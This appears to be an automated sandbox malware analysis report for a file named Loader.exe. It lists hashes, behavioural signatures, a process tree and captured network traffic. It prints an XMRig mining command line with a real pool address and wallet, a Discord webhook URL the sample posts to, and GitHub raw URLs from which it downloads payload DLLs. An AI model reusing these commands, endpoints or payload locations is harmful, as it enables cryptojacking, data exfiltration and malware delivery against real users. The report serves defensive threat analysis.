Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/02/2023, 18:48 UTC

General

  • Target

    Loader.exe

  • Size

    1.6MB

  • MD5

    a44e526804469076d712e8a05ddd7759

  • SHA1

    7010fda540e70139020a7a79730e74e99bd8e6c9

  • SHA256

    46d7128963bde013c8ec359b285e47eabbf9c88e332735e02ced518773e8e95f

  • SHA512

    04c40ef00c80d641c4f7bced8aefc180d695ea23ef79e272167f1a567484be2ab7031ca55a246cbeba1ed0c0ed93223fc2a33daed7f2048c62f169f0e6325b36

  • SSDEEP

    49152:fBvdZG5o8InNXL9Qn0HpZjI64n2hcyfT2:pFZG5oNnRfh9

Score
10/10

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4788
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAyAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4388
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2292
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RMHgF8iWWzutXCpbDgarftrSUoycmQgCqo.Worker_CPU -p x --cpu-max-threads-hint=50
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3776

Network

  • flag-us
    DNS
    ptb.discord.com
    Loader.exe
    Remote address:
    8.8.8.8:53
    Request
    ptb.discord.com
    IN A
    Response
    ptb.discord.com
    IN A
    162.159.136.232
    ptb.discord.com
    IN A
    162.159.137.232
    ptb.discord.com
    IN A
    162.159.135.232
    ptb.discord.com
    IN A
    162.159.128.233
    ptb.discord.com
    IN A
    162.159.138.232
  • flag-us
    DNS
    ptb.discord.com
    Loader.exe
    Remote address:
    8.8.8.8:53
    Request
    ptb.discord.com
    IN A
  • flag-us
    POST
    https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy
    Loader.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: ptb.discord.com
    Content-Length: 202
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 204 No Content
    Date: Fri, 03 Feb 2023 18:50:04 GMT
    Content-Type: text/html; charset=utf-8
    Connection: keep-alive
    set-cookie: __dcfduid=92521944a3f311ed9de3aa7f43fb292e; Expires=Wed, 02-Feb-2028 18:50:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1675450205
    x-ratelimit-reset-after: 1
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pL7SQtDT7gH4Lb0C9uxZNWQFaMALfpkDcVAXFNrgeHpyCZa%2B5G4gvG59Y%2B6bB0VAFfpWEVJ1qeKI2yy%2BjAuKrg7639CrB%2FUHQ1%2Bb11SGLe9gPsnztOg1LmaN9naytI33yA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Set-Cookie: __sdcfduid=92521944a3f311ed9de3aa7f43fb292e270c2dbfbf6ee9493aac91798c4c7ecdc5e20c5d7c5ad9b19e4545be8f365585; Expires=Wed, 02-Feb-2028 18:50:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
    Set-Cookie: __cfruid=6105629be7006024db08d79af17898da8a1ce256-1675450204; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 793d59a16c001c9e-AMS
  • flag-us
    DNS
    14.110.152.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.110.152.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    github.com
    MSBuild.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.207.73.82
  • flag-in
    GET
    https://github.com/test93872/demo5/raw/main/plugin_3.dll
    MSBuild.exe
    Remote address:
    20.207.73.82:443
    Request
    GET /test93872/demo5/raw/main/plugin_3.dll HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Fri, 03 Feb 2023 18:49:31 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Access-Control-Allow-Origin: https://render.githubusercontent.com
    Location: https://raw.githubusercontent.com/test93872/demo5/main/plugin_3.dll
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
    Content-Length: 0
    X-GitHub-Request-Id: C26F:2A6E:F06103:12E05B6:63DD5774
  • flag-in
    GET
    https://github.com/test93872/demo5/raw/main/plugin_4.dll
    MSBuild.exe
    Remote address:
    20.207.73.82:443
    Request
    GET /test93872/demo5/raw/main/plugin_4.dll HTTP/1.1
    Host: github.com
    Response
    HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Fri, 03 Feb 2023 18:48:51 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Access-Control-Allow-Origin: https://render.githubusercontent.com
    Location: https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dll
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
    Content-Length: 0
    X-GitHub-Request-Id: C26F:2A6E:F061B4:12E06B4:63DD5779
  • flag-us
    DNS
    raw.githubusercontent.com
    MSBuild.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.110.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
  • flag-us
    GET
    https://raw.githubusercontent.com/test93872/demo5/main/plugin_3.dll
    MSBuild.exe
    Remote address:
    185.199.110.133:443
    Request
    GET /test93872/demo5/main/plugin_3.dll HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 2372653
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "988eccb86fa222930aee8203a6f29ad25b026c60ab99129b668cbd4e8ef39412"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: CE90:4761:21F1C:2A33A:63DD55A6
    Accept-Ranges: bytes
    Date: Fri, 03 Feb 2023 18:50:28 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ams21070-AMS
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1675450228.415971,VS0,VE22
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    X-Fastly-Request-ID: 6771c13d1164bdd7492733544a76933c96f29571
    Expires: Fri, 03 Feb 2023 18:55:28 GMT
    Source-Age: 102
  • flag-us
    GET
    https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dll
    MSBuild.exe
    Remote address:
    185.199.110.133:443
    Request
    GET /test93872/demo5/main/plugin_4.dll HTTP/1.1
    Host: raw.githubusercontent.com
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 37099
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "58a747ff1a171f0565a8909ab8adcac7763e62a5011998ec5b3daed1956393f9"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 692C:E376:E2DAAE:F21145:63DD55AC
    Accept-Ranges: bytes
    Date: Fri, 03 Feb 2023 18:50:33 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ams21070-AMS
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1675450234.878578,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    X-Fastly-Request-ID: f438c8fe8180c5f07c397cedf7e8c7bf52b59321
    Expires: Fri, 03 Feb 2023 18:55:33 GMT
    Source-Age: 102
  • flag-us
    DNS
    rx.unmineable.com
    AddInProcess.exe
    Remote address:
    8.8.8.8:53
    Request
    rx.unmineable.com
    IN A
    Response
    rx.unmineable.com
    IN CNAME
    rx.unminable.com
    rx.unminable.com
    IN CNAME
    rx-asia.unminable.com
    rx-asia.unminable.com
    IN CNAME
    rx-asia-sgp.unminable.com
    rx-asia-sgp.unminable.com
    IN A
    178.128.51.168
  • 20.224.254.73:443
    40 B
    1
  • 20.42.65.84:443
    322 B
    7
  • 162.159.136.232:443
    https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy
    tls, http
    Loader.exe
    1.2kB
    4.6kB
    9
    9

    HTTP Request

    POST https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy

    HTTP Response

    204
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 163.123.142.203:44810
    MSBuild.exe
    442 B
    592 B
    7
    6
  • 20.207.73.82:443
    https://github.com/test93872/demo5/raw/main/plugin_4.dll
    tls, http
    MSBuild.exe
    981 B
    8.2kB
    11
    10

    HTTP Request

    GET https://github.com/test93872/demo5/raw/main/plugin_3.dll

    HTTP Response

    302

    HTTP Request

    GET https://github.com/test93872/demo5/raw/main/plugin_4.dll

    HTTP Response

    302
  • 185.199.110.133:443
    https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dll
    tls, http
    MSBuild.exe
    51.5kB
    2.5MB
    1018
    1791

    HTTP Request

    GET https://raw.githubusercontent.com/test93872/demo5/main/plugin_3.dll

    HTTP Response

    200

    HTTP Request

    GET https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dll

    HTTP Response

    200
  • 93.184.221.240:80
    322 B
    7
  • 178.128.51.168:3333
    rx.unmineable.com
    AddInProcess.exe
    1.1kB
    2.0kB
    9
    8
  • 104.80.229.204:443
    322 B
    7
  • 8.8.8.8:53
    ptb.discord.com
    dns
    Loader.exe
    122 B
    141 B
    2
    1

    DNS Request

    ptb.discord.com

    DNS Request

    ptb.discord.com

    DNS Response

    162.159.136.232
    162.159.137.232
    162.159.135.232
    162.159.128.233
    162.159.138.232

  • 8.8.8.8:53
    14.110.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    14.110.152.52.in-addr.arpa

  • 8.8.8.8:53
    github.com
    dns
    MSBuild.exe
    56 B
    72 B
    1
    1

    DNS Request

    github.com

    DNS Response

    20.207.73.82

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    MSBuild.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.110.133
    185.199.111.133
    185.199.109.133
    185.199.108.133

  • 8.8.8.8:53
    rx.unmineable.com
    dns
    AddInProcess.exe
    63 B
    154 B
    1
    1

    DNS Request

    rx.unmineable.com

    DNS Response

    178.128.51.168

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2292-144-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2292-143-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2292-140-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3776-151-0x000001D7BC820000-0x000001D7BC860000-memory.dmp

    Filesize

    256KB

  • memory/3776-153-0x000001D7BC6F0000-0x000001D7BC710000-memory.dmp

    Filesize

    128KB

  • memory/3776-149-0x000001D7BC6A0000-0x000001D7BC6C0000-memory.dmp

    Filesize

    128KB

  • memory/3776-148-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/3776-154-0x000001D7BC6F0000-0x000001D7BC710000-memory.dmp

    Filesize

    128KB

  • memory/3776-147-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/3776-145-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/3776-152-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/3776-150-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/4388-136-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4388-139-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4388-138-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4788-137-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4788-142-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4788-132-0x0000018696100000-0x00000186962A2000-memory.dmp

    Filesize

    1.6MB

  • memory/4788-134-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4788-133-0x0000018697EF0000-0x0000018697F12000-memory.dmp

    Filesize

    136KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.